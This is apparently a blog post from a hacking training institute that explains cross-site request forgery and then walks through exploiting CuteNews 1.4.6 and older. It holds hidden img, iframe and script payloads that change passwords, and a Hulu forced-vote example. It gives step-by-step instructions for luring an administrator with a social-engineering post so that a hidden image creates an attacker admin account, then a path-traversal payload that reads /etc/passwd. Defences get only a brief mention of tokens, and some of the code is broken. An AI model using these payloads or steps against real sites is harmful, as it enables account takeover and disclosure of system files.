Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

CSRF is likely one of the most prominent vulnerabilities today.
When it is mixed with XSS, it can be seriously deadly.

Cross Site Request Forgery can be used to trick an administrator/person into browsing a webpage which contains a function.

A CSRF attack takes the privileges of a victim to complete an action on their behalf. For example, a CSRF attack can change the Password and Email address of a person or even Purchase something.

CSRF can only occur when a web form does not check its HTTP information to make sure that the browser came from its own site.
It is possible to make the CSRF attack on the targeted site itself. This is called “Stored CSRF flaws”. If a “Stored CSRF Flaw” is available, the impact of the CSRF is larger.

The Requirements to exploiting CSRF:
The victim must be identified by the HTTP Authentication.
The victim must have SESSION \ COOKIE on the targeted website.

For all this to work you need the victim to actually be logged into the targeted site.

What tags can I use with CSRF?

You can use most of the HTML tags what allow you to embed links into them.

Examples.

Code:
img tag:
<img style="display:none;" src="http://targetsite.com/change_password.php?new_password=Ascendonisboss">

 

Code:
iframe tag:
<iframe src="http://targetsite.com/change_password.php?new_password=Ascendonisboss"></iframe>

 

Code:
<script>
Java Script:
var poniz = new Image();
test.poniz = "http://targetsite.com/change_password.php?new_password=Ascendonisboss";
</script>

CSRF is largely popular although some people don’t know it.
Here is an example of a vulnerability in “Hulu”:

Code:
document.write('<form action="http://www.hulu.com/videos/vote/344578" method=post><input name=up value=5><input name=_ value=""></form>')
http://www.hulu.com/shows/subscribe/344578?type=episodes,clips&first_run_only=0

This will make the victim vote without their confirmation or subscribing to new episodes.

However!

Tokens prevent hackers from executing CSRF attacks.
A “token” is a hidden randomly generated ID for sending data.
This is for logging into forms and plenty of other stuff.

The targeted website’s owner might regularly delete cookies.

They might not use GET \ REQUEST super-global variables in their php.

A token will look like this:

Code:
<input type="hidden" name="23qsrttf556usjscr2v7a211ifb" value='1' id="token" />

Cutenews CSRF- Cross Site Request Forgery:

So, this concludes as Cute News 1.4.6 and lower exploitable. You need simple SE Skills to do so.

Using the above explanation of CSRF, we can make a admin account.

The steps to making an admin account :

1) Host a website with a webpage with this source code.
You need to edit it with your wanted username and password along with your targeted website.
Source code:

Code:
<img
src="http://Targetedsite.com/cutenews/index.php?regusername=Usernameyouwant&regpassword=Passwordyouwant&regnickname=Nicknameyouwant&regemail=a%40a.
com&reglevel=1&action=adduser&mod=editusers">

Try blending this in with the webpage. Post a funny image or something.

2) If you haven’t already, make an account on the targeted websites cutenews.

3) You now need to make a simple Social Engineer attempt on an admin. To do this, you need to make a post including your link to the CSRF landing page and something to go with it. eg. “Hey click this, it’s really funny xD ‘link’ ”

4) Once the admin clicks your Malicious webpage it will execute a function. The function will register a new admin account with the credentials you added. It’s a bit like SJDB.

Congratulations if you have done this!

Cutenews LFI- Local File Inclusion- Requires Admin Access:

Once you have admin access, there is a neat trick to allow you to view the /ect/passwd file.

The steps to LFI :

1) Go to Targetedsite.com/cutenews/index.php?mod=options&action=syscon

2) Change the skin variable in the System Configuration

3) You then need to intercept the POST and modify the form:
save_con%5Bskin%5D=../../../../../../../../../../../../../../../../etc/passwd%00

4) Load any page on the website and the /etc/passwd will appear.

This has been patched for newer version of Cutenews.
Lower versions are vulnerable to so many more similar attacks.

www.extremehacking.org
Sadik Shaikh | Cyber Suraksha Abhiyan, Ethical Hacking Training InstituteCEHv9,CHFI,ECSAv9,CAST,ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNECertified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-IndiaEthical Hacking Course in Pune-India